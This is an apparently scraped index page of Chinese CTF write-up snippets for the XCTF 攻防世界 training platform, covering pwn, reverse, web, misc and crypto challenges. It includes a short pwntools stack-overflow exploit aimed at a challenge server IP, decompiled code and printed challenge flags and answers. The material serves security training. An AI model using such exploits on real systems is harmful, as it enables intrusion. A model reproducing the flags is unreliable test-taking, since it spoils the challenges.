E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
攻防世界
非预期解 |
攻防世界
pwn进阶 反应釜开关控制
文章目录菜鸡独白0x00.看题0x01.查看保护0x02.懵...非预期0x03.后记菜鸡独白好久没做题了,看大佬们天天在朋友圈晒比赛成绩,不由感叹WTCL!今天下午无聊继续刷起ADworld。0x00.看题题目描述:小M在里一个私人矿厂中发现了一条TNT生产线中硝化反应釜的接口,反应釜是一种反应设备,非常的不稳定,会因为很多原因造成损坏,导致生产被迫停止。她怀疑这个工厂可能进行地下军火的制作,所
_n19hT
·
2020-08-25 17:53
#
pwn
攻防世界
反应釜开关控制和cgpwn2
以为这道题应该挺难的,没想到挺简单的。查保护拖进ida这里有gets可以进行栈溢出expfrompwnimport*p=remote("220.249.52.133",50651)shell=0x4005f6payload='a'*0x208+p64(shell)p.recv()p.sendline(payload)p.interactive()cgpwn2从这里看,没有我们所熟悉的system(
inryyy
·
2020-08-25 17:40
web安全原理-文件包含漏洞
前言起来吃完早饭就开始刷
攻防世界
的题,一个简单的文件包含题我竟然都做不出来我服了拿出买的书开始从头学习总结文件包含漏洞!
笑花大王
·
2020-08-25 05:58
攻防世界
write up (loading.....)
攻防世界
ics05通过随便一点,发现只有这个页面可以点的通过查看源代码,发现?page=index通过文件包含漏洞php流的http://111.198.29.45:39719/index.php?
READER-L
·
2020-08-25 04:01
攻防世界
CTF-
攻防世界
-MISC-新手练习区(001-012)
目录MISC新手练习区this_is_flagpdfgive_you_flag坚持60sgif掀桌子如来十三掌steganoSimpleRARbase64stegoext3功夫再高也怕菜刀MISC新手练习区this_is_flag题目描述:Mostflagsareintheformflag{xxx},forexample:flag{th1s_!s_a_d4m0_4la9}flag:flag{th1
beglage
·
2020-08-25 00:41
CTF
信息安全
CTF
攻防世界
MISC
攻防世界
fakebook writeup
1、进入环境首先来一波信息收集robots.txt存在,我们知道了有user.php.bak收集一波存在哪些路径login.php(get)join.php(get)join.ok.php(post)view.php?no=xx(get)flag.phpjoin.ok.php和view.php?no=xx可能存在注入2、分析user.php.bak,代码对blog的形式做了正则匹配,然后curl执
白风之下
·
2020-08-24 17:44
ctf
攻防世界
reverse (一)
dmd-50下载是个elf载入ida观察有一段代码使用md5加密下方有一段字符串应该为加密后的字符再下面有个if-else语言输出是否为正常字符对字符串进行md5解密发现明文md5加密两次尝试flag为grape加密一次的值Shuffle打开是个elf文件载入ida转化为字符得到flag很简单的题目re2-cpp-is-awesome是个elf文件载入ida在39行处判断是否和符合的字符相等wor
名字还是短一点
·
2020-08-24 06:18
攻防世界
re --- srm-50
一看是exe文件,那就要先大胆尝试运行一下我还在猜想会不会邮箱和输入的字符串之间有什么对应的关系,先打开ida观察一下瞅一眼函数就这俩有用的。先看winmain,先普及一下知识吧,说的很明白,不用多想,里面有个dialogfun函数,问题应该在这里面。这些都是废话,查一查就知道是说模板的,往下看第一个if,我以为有点什么后来发现不过是检查邮箱中@和.什么的那么重要的不过就是第二个if了,其实很容易
arch li
·
2020-08-24 06:43
攻防世界wp
dMd----
攻防世界
首先在Linux上查看题目,没有什么发现elf文件,之后使用ida打开看看,找到main函数,f5查看,上图一些字符是char过的,便于查看,发现是一个ifelse语句,先经过了MD5加密然后判断v41,是否是符合条件,所以根据这个条件,我们可以返回使用md5解密780438d5b6e29db0898bc4f0225935c0两层所以加密一次将grape再加密一次转载于:https://www.c
weixin_30952535
·
2020-08-24 06:24
攻防世界
--dmd-50
测试文件:https://adworld.xctf.org.cn/media/task/attachments/7ef7678559ea46cbb535c0b6835f2f4d1.准备获取信息64位文件2.IDA打开1int__cdeclmain(intargc,constchar**argv,constchar**envp)2{3__int64v3;//rax4__int64v4;//rax5_
weixin_30876945
·
2020-08-24 06:52
攻防世界
WP-reverse-Reversing-XCTF 3rd-GCTF-2017-hackme
其他的不说了,查看伪代码__int64sub_400F8E(){charv1[136];//[rsp+10h][rbp-B0h]intv2;//[rsp+98h][rbp-28h]charv3;//[rsp+9Fh][rbp-21h]intv4;//[rsp+A0h][rbp-20h]unsigned__int8v5;//[rsp+A6h][rbp-1Ah]charv6;//[rsp+A7h][r
wallacegen
·
2020-08-24 06:02
ida
ctf
reverse
攻防世界
level0 + (Jarvis Oj)(Pwn) level1
攻防世界
level0将文件在ida中打开,输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互,双击进去查看,,无参数传入,buf长度为0x80,即0x80h
南吕十七
·
2020-08-24 06:41
新知识
攻防世界
(pwn)babyheap(一些常见的堆利用方法)
前言:此题攻击链路:null_off_by_one修改堆块信息=>UAF泄露libc基址和其他有用信息=>fastbinattack申请堆块到指定地址=>利用realloc_hook来调整堆栈=>one_gadgetgetshell。64位程序,保护全开。程序提供增删查操作,没有改操作。由于题目已经给了libc-2.23文件(虽然给错了)说明远端库是2.23版本的,不是2.27的,在此,我们不用纠
PLpa、
·
2020-08-24 06:10
pwn
攻防世界
-XCTF-逆向进阶区(持续更新)
写在前面的话还是决定把进阶区以前写过也都记录一下,也算是一个温故知新的过程吧。另外希望自己能早点把进阶区百人以上的题目刷完,加油!(2020.6.2)。啊,进阶区的题目经常会有变动,前面的题可能会被调到后面,所以顺序可能会不太对。Guess-the-Number拿到程序,是个jar文件,拖进jd-jui查看,可以直接看到主函数。可以看到,当判断成立时,经过异或运算后会直接输出flagmy_numb
行歌
·
2020-08-24 06:09
babyfengshui__BUUCTF
也没什么分析的效果,把题做出来了,写个文章大家分析交流我看网上大家都说这个题适合入门堆得看,其实我感觉要是没接触过堆得话,理解起来还是比较困难的,我会将自己做题的思路记录下来,让大家少踩点坑好像这个题在
攻防世界
也存在做题思路
Jc^
·
2020-08-24 06:59
#
BUUCTF_pwn
BUUCTF
pwn
堆溢出
攻防世界
--hackme
测试链接:https://adworld.xctf.org.cn/media/task/attachments/33009710e3f44f04b5a4cdbaaa46f00a1.准备获取信息64位文件2.IDA打开__int64__fastcallsub_400F8E(__int64a1,__int64a2){charv3[136];//[rsp+10h][rbp-B0h]intv4;//[rs
Hk_Mayfly
·
2020-08-24 06:49
攻防世界
web进阶区ics-06
首先,打开链接到处点了点,发现只有题目描述里的报表中心可以点进去发现id=1,改了几个数字,发现页面没有变化,看了看源代码,用开发者选项也没有发现,试了试burpsuite抓包,也没发现啥到网上看了看各位大佬的wp,发现这个题得用burpsuite爆破(触及到了我的盲区。。。),只能看着大佬的博客,一步步跟着来抓包后发送给intruder,查看target是否正确,导入字典点击右上角的starta
gongjingege
·
2020-08-24 05:45
ctf
攻防世界
逆向 EasyRE
攻防世界
逆向EasyRE(原创)原题如下:下载文件:查看exe文件的脱壳信息并用IDA打开。Shift+F12查看字符串窗口,发现flag,但是并不对。注意到下面的right\n,查看其伪代码。
与日平肩以头抢地
·
2020-08-24 05:10
逆向
攻防世界
reverse 进阶 1-4
1.dmd-50suctf-2016md5后比较,在线解md5得到:md5(md5($pass)),所以将grape再进行MD5b781cbb29054db12f88f08c6e161c1992.ShuffleSECCON-CTF-2014硬编码:SECCON{WelcometotheSECCON2014CTF!}3.re2-cpp-is-awesomealexctf-20171__int64__
deyou0823
·
2020-08-24 05:03
攻防世界
reverse android-app-100
android-app-100suctf-2016jeb启动,找到点击事件:验证流程:输入作为参数-->processObjectArrayFromNative得到一返回值(ret_a)-->IsCorrect返回0,失败;返回1,成功-->输出"Sharif_CTF("+md5(str(d+ret_a)+”“+”)“(.d=0x1BEBE)可以发现flag的获取关键在于processObject
deyou0823
·
2020-08-24 05:31
攻防世界
reverse babymips
babymipsXCTF4th-QCTF-2018mips,ida中想要反编译的化需要安装插件,这题并不复杂直接看mips汇编也没什么难度,这里我用了ghidra,直接可以查看反编译。1voidFUN_004009a8(void)23{4intiVar1;5inti;6byteinput[36];78setbuf(stdout,(char*)0x0);9setbuf(stdin,(char*)0x
deyou0823
·
2020-08-24 05:31
攻防世界
reverse 进阶 easyre-153
easyre-153查壳:upx壳脱壳:1int__cdeclmain(intargc,constchar**argv,constchar**envp)2{3intpipedes[2];//[esp+18h][ebp-38h]4__pid_tv5;//[esp+20h][ebp-30h]5intv6;//[esp+24h][ebp-2Ch]6charbuf;//[esp+2Eh][ebp-22h]
deyou0823
·
2020-08-24 05:31
攻防世界
reverse debug
debugXCTF3rd-GCTF-2017.net程序,这里我用的dnspy,当然.netReflector也很好用。查看程序,发现是明文比较,下断,debug,完成。flag{967DDDFBCD32C1F53527C221D9E40A0B}转载于:https://www.cnblogs.com/DirWang/p/11578646.html
deyou0823
·
2020-08-24 05:31
攻防世界
reverse BABYRE
BABYREXCTF4th-WHCTF-2017int__cdeclmain(intargc,constchar**argv,constchar**envp){chars;//[rsp+0h][rbp-20h]intv5;//[rsp+18h][rbp-8h]inti;//[rsp+1Ch][rbp-4h]for(i=0;i<=181;++i){envp=(constchar**)(*((unsi
deyou0823
·
2020-08-24 05:31
攻防世界
reverse Newbie_calculations
Newbie_calculationsHack-you-2014题目名百度翻译成新手计算,那我猜应该是个实现计算器的题目。。。。IDA打开程序,发现一长串的函数反复调用,而且程序没有输入,只有输出。额,那这样的话程序运行就应该输出flag,但程序中肯定会有垃圾循环操作,就让你跑不出来。0.0这种题目就要分析函数作用,简化,自己实现算法。程序流程:1for(i=0;i<32;++i)2flag[i]
deyou0823
·
2020-08-24 05:31
攻防世界
reverse reverse-for-the-holy-grail-350
reverse-for-the-holy-grail-350tu-ctf-2016程序流程很简单,就一个检验函数:1__int64__fastcallstringMod(__int64*a1)2{3__int64length;//r94char*c_str;//r105__int64i;//rcx6signedintv4;//er87int*temp_2;//rdi8int*temp_3;//rs
deyou0823
·
2020-08-24 05:31
初试ctf
初试CTF在朋友的推荐下,在
攻防世界
里练ctf,借博客总结加深记忆。
Tangthr
·
2020-08-24 05:15
ctf
hackme
攻防世界
RE
__int64__fastcallsub_400F8E(__int64a1,chara2){__int64v2;//r8@1__int64v3;//rdx@1__int64v4;//rcx@1__int64v5;//r8@1__int64v6;//r9@1signedintv7;//eax@5charbuffer[136];//[sp+10h][bp-B0h]@3intv10;//[sp+98h]
Zarcs_233
·
2020-08-24 05:24
CTF
2019.10.16 babystack
攻防世界
我们先检查一下程序的开了哪些保护机制。v8就是那个标志canary,程序有个输出puts(),有read(),并且read()有一个非常明显的溢出(s的大小只有0x90,但是read读取了0x100大小的数据)我们用one_gadgetlibc文件名来查找one_gadget。①这道题主要是绕过canary,然后栈溢出getshell。②经分析,read函数读入到s处,可以溢出。③put函数输出s
藏蓝色的达达
·
2020-08-24 05:20
pwn
攻防世界
re----Ignite me wp
这个一看就是写脚本的,感觉都不是很难,最需要的就是看你写代码的能力吧,方法好用效率会很高。先看一下代码知道输入内容中一定包含EIS{}但是这些都不重要,要找到加密的部分,很明显,在Congratulations的if条件判断出。一眼就瞟到最后的那句,肯定和那句有关系,让这个字符串和v4做个比较,那么v4必定是个加密的部分。挨个函数看下来,从三个if开始就是我们最需要研究的部分了。显然是对你的输入字
arch li
·
2020-08-24 05:38
攻防世界wp
(
攻防世界
)(pwn)pwn1(厦门邀请赛)babystack
canary!canary!canary!拿到题目,下载附件,查看保护。可以很清楚的看到,程序开了canary,这就说明我们不能实现暴力的栈溢出,还要考虑这个canary的值。我们首先运行一下程序:可以很清楚的看出程序的功能,当我们选择1时,我们就可以输入,当我们选择2时,我们可以输出我们前面输入的东西。进入IDA看源代码:我们可以看到canary的值存放在v6里,v6距离rbp8h,而我们输入的
PLpa、
·
2020-08-24 05:22
攻防世界
逆向 hackme
攻防世界
逆向hackme(原创)原题如下:下载文件IDA打开确定sub_400F8E()函数找flag。
与日平肩以头抢地
·
2020-08-24 05:05
逆向
攻防世界
reverse hackme
hackmeXCTF3rd-GCTF-2017__int64__fastcallsub_400F8E(__int64a1,__int64a2){charinput[136];//[rsp+10h][rbp-B0h]intv4;//[rsp+98h][rbp-28h]charv5;//[rsp+9Fh][rbp-21h]intv6;//[rsp+A0h][rbp-20h]unsigned__int8
deyou0823
·
2020-08-24 05:03
攻防世界
XCTF—web入门题知识点、进阶提高题Writeup
WriteUpXCTF-Web新手入门区view_sourceget_postrobotsbackupcookiedisabledbuttonsimplejsxffrefererweakauthwebshellcommandexecutionsimple_php高手进阶区XCTF-Web2016年全国大学生信息安全竞赛开始设立创新实践技能赛,采取的就是传统的CTF赛制。在《2016年全国大学生信息安
带你看宇宙
·
2020-08-24 05:29
CTF
信息安全
python
web
php
攻防世界
RE hackme WP
本题为XCTF3rd-GCTF-2017的RE,该题目有一些小坑,特此记录拿到题目后反编译如下:这是通过字符串查找找到的主方法main:__int64sub_400F8E(){charv1[136];//[rsp+10h][rbp-B0h]intv2;//[rsp+98h][rbp-28h]charv3;//[rsp+9Fh][rbp-21h]intv4;//[rsp+A0h][rbp-20h]u
h1nt
·
2020-08-24 05:14
比赛&刷题
WP
攻防世界
-wp-MISC-新手区-4-坚持60s
题目来源:08067CTF题目描述:菜狗发现最近菜猫不爱理他,反而迷上了菜鸡题目附件:9dc125bf1b84478cb14813d9bed6470c.jar题目思路:一个java做的游戏,既然是程序会给出flag,那么flag就在源代码中了。解题过程:1.用java反编译工具jd-gui反编译,在/cn.bjsxt/plane/PlaneGameFrame.class中或者从/META-INF/
Scorpio_m7
·
2020-08-23 19:48
攻防世界
安全
Web_python_template_injection
攻防世界
ctf web
Web_python_template_injectionflask是使用Jinja2来作为渲染引擎的。看例子在网站的根目录下新建templates文件夹,这里是用来存放html文件。也就是模板文件。看到templateinjection可以猜到是SSTI(Server-SideTemplateInjection)服务端模板注入{{}}在Jinja2中作为变量包裹标识符,所以在{{}}里面的内容会
caiji仔
·
2020-08-22 19:20
攻防世界
—— Crypto新手练习区11题(Normal RSA)题解
题目分析从题目就可以看出来这道题在考标准的RSA算法,而且会用到工具。下载附件解压后,发现有两个文件flag.enc和pubkey.pem。从文件的命名可知,前者就是加密后的flag,而后者是公钥。因为RSA是非对称加密算法,公钥加密,私钥解密,可以保证信息的机密性,而私钥加密,公钥解密,可以对信息进行签名,保证信息不可以被抵赖。这里用到的工具就是openssl,其中包含了许多常见的加密算法,可以
筠yun
·
2020-08-20 22:39
CTF
pwn ret2syscall
学了学pwndbg的使用,文章在这里:gdb+pwndbg食用指南这篇博客注定是一篇水文,因为昨天做了做XCTF
攻防世界
上的题目,基础题都做不来,那题应该是ret2text的内容,还是太菜,没有深刻理解原理
YouNgFreshq
·
2020-08-19 21:26
3.pwn入门新手做无system泄露libc.so版本
攻防世界
pwn100 pwn200(dynelf 、libsearcher与got表plt表解)
上来先贴一个got表与plt表大佬写的got表与plt表详解查找函数地址的典型方法是从泄漏的同一个库中的另一个函数的地址计算到所需函数的偏移量,然而,要使这种方法有效地工作,gLibc的远程服务器版本需要与我们的相同。我们还可以通过泄漏一些函数并在libcdb.com中搜索找到gLibc的远程版本,但有时这种方法会失败dynelf其基本代码模板如下:p=process('./xxx')deflea
Answer777
·
2020-08-19 18:10
安全
babyfengshui [XCTF-PWN][高手进阶区]CTF writeup
攻防世界
题解系列23
题目地址:babyfengshui这个题目是高手进阶区的第12题。本题的主要考点是堆溢出,现在ctf主要的考点都已经转移到了堆溢出了,这个题目作为堆溢出的基础题目,还是很容易入门的。先看看题目惯例检查一下保护机制:[*]'/ctf/work/python/babyfengshui/babyfengshui'Arch:i386-32-littleRELRO:PartialRELROStack:Can
3riC5r
·
2020-08-19 17:11
XCTF-PWN
CTF
04Reverse基础(五)
04Reverse基础(五)任务内容学习笔记一、《图解密码学》二、《程序员的自我修养》任务实现一、IDA补充学习二、
攻防世界
REVERSE新手区12道题目并编写WriteUp任务内容1.完成
攻防世界
REVERSE
beloved_fjq
·
2020-08-19 09:30
【XCTF
攻防世界
】CRYPTO 密码学 新手练习区 幂数加密
题目链接:https://adworld.xctf.org.cn/task/answer?type=crypto&number=5&grade=0&id=5120&page=1下载附件,得到一串数字。没有头绪。查看wp得知这是二进制幂数加密法百度链接:二进制幂数加密法从给出的一串字符可以看出,除第一组以外,每一个以0分隔的一组排列的数字都是从小到大那么可以确定,以0分隔的每一组都是一个字符不明白的
Kal1
·
2020-08-17 17:00
CTF刷题
密码学
【CTF】
攻防世界
如来十三掌
计算步骤:先利用与佛论禅网站(http://keyfc.net/bbs/tools/tudoucode.aspx)将原有的文字转化为MzkuM3gvMUAwnzuvn3cgozMlMTuvqzAenJchMUAeqzWenzEmLJW9再利用(https://rot13.com/)将代码转化为ZmxhZ3tiZHNjamhia3ptbmZyZGhidmNraWpuZHNrdmJramRzYWJ9最
LIU_Jessica
·
2020-08-17 17:27
攻防世界
crypto练习--幂数加密
幂数加密题目描述:你和小鱼终于走到了最后的一个谜题所在的地方,上面写着一段话“亲爱的朋友,很开心你对网络安全有这么大的兴趣,希望你一直坚持下去,不要放弃,学到一些知识,走进广阔的安全大世界”,你和小鱼接过谜题,开始了耐心细致的解答。flag为cyberpeace{你解答出的八位大写字母}解析:原以为是二进制幂数加密法,但是比照之后发现不太对,没有字母转换后出现8这个数字。后面发现是**01248密
Sylvia_j
·
2020-08-17 14:29
ctf
ctf
攻防世界
open-source
题目链接:https://adworld.xctf.org.cn/task/answer?type=reverse&number=4&grade=0&id=5076&page=1打开附件可得到下面这段代码:分析:1.必须满足输入四个参数;2.第二个参数等于0xcafe;3.第三个参数对5取余不能等于3,或者是对17取余等于8;4.第四个参数是:h4cky0u根据以上条件,我们可以得出:firs
Sylvia_j
·
2020-08-17 14:29
ctf
攻防世界
_MISC:<base64➗4> <wireshark-1> <pure_color> <Training-Stegano-1> <can_has_stdio> <János-the-Rip>
目录前言base64➗4wireshark-1pure_colorTraining-Stegano-1can_has_stdio?János-the-Ripper最后前言为了不久之后的ctf比赛做准备,所以把MISC的低分题先刷一遍,毕竟高分题的话,目前的知识水平还不是很够。base64➗4首先看题目,跟base64加密有关,拿到一串字符我们使用base64解码好像不太对,那个➗没用上,在猜测,难
Automan之鸿鹄
·
2020-08-17 14:28
CTF_MISC_wp
程序人生
经验分享
攻防世界
MISCall
攻防世界
MISCall1、题目网址:
攻防世界
2、原理及工具原理:git信息泄露git官网资料:https://www.git-scm.com/book/zh/v2工具:kali、python3、解题过程下载下来的文件名字太长
Small@nt
·
2020-08-17 14:51
CTF
攻防世界
python-trade
攻防世界
python-trade1、题目
攻防世界
python-trade2、下载文件后发现是一个pyc文件,对pyc文件进行反编译注:pyc文件是python编译产生的中间文件。
Small@nt
·
2020-08-17 14:20
攻防世界
crypto
幂数加密这个百度词条了一波然而并没有新的发现==然后发现了用0位分隔符然后相加题目说的是大写然后直接大写WELLDONEbase64简单的base64加密Caesar凯撒密码。。#!/user/bin/envpython#-*-coding:utf-8-*-strs='oknqdbqmoq{kag_tmhq_xqmdzqp_omqemd_qzodkbfuaz}'str_print='abcdefg
pipixia233333
·
2020-08-17 14:22
CTF
crypto
上一页
12
13
14
15
16
17
18
19
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他